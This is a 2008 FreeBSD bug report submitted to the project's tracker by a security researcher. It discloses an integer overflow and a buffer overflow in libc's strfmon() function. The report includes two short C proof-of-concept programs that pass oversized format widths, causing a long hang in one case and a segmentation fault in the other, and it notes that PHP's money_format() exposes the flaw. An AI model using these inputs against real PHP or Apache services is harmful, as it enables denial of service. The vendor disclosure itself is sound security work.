Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 18 Mar 2008 04:00:51 GMT
From:      Maksymilian Arciemowicz <cxib@securityreason.com>
To:        freebsd-gnats-submit@FreeBSD.org
Subject:   i386/121818: Buffer Overflow, Integer Overflow
Message-ID:  <200803180400.m2I40p6g067509@www.freebsd.org>
Resent-Message-ID: <200803180410.m2I4A3U6063980@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help 

>Number:         121818
>Category:       i386
>Synopsis:       Buffer Overflow, Integer Overflow
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-i386
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Tue Mar 18 04:10:03 UTC 2008
>Closed-Date:
>Last-Modified:
>Originator:     Maksymilian Arciemowicz
>Release:        FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE
>Organization:
SecurityReason.com
>Environment:
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

>Description:
The main problem exists in /usr/src/lib/libc/stdlib/strfmon.c function

Function GET_NUMBER() return wrong integer

#define GET_NUMBER(VAR)	do {					\
	VAR = 0;						\
	while (isdigit((unsigned char)*fmt)) {			\
		VAR *= 10;					\
		VAR += *fmt - '0';				\
		fmt++;						\
	}							\
} while (0)


So for example exploit:

---Integer Overflow---
#include <stdio.h>
#include <monetary.h>


main(){
	char buff[50];
	char *bux=buff;
	int res;
	
	res=strfmon(bux, 50, "%#99999999999999999999n", "-999.999");
}
---Integer Overflow---

This program will execute, long time. It is very dangerous, because a lot of programs (like PHP), use this function. It is possible to kill apache childs


Next example:
---Buffer Overflow---
#include <stdio.h>
#include <monetary.h>


main(){
	char buff[50];
	char *bux=buff;
	int res;
	
	res=strfmon(bux, 50, "%99999999999999999999n", "-999.999");
}
---Buffer Overflow---

Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7

We are waiting for fast answer, because in PHP 5.2.5 we use money_format() function with strfmon() function.

Best Regards
Maksymilian Arciemowicz
SecurityReason

>How-To-Repeat:
Checks integers
>Fix:
we are waiting to answer.

>Release-Note:
>Audit-Trail:
>Unformatted:

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200803180400.m2I40p6g067509>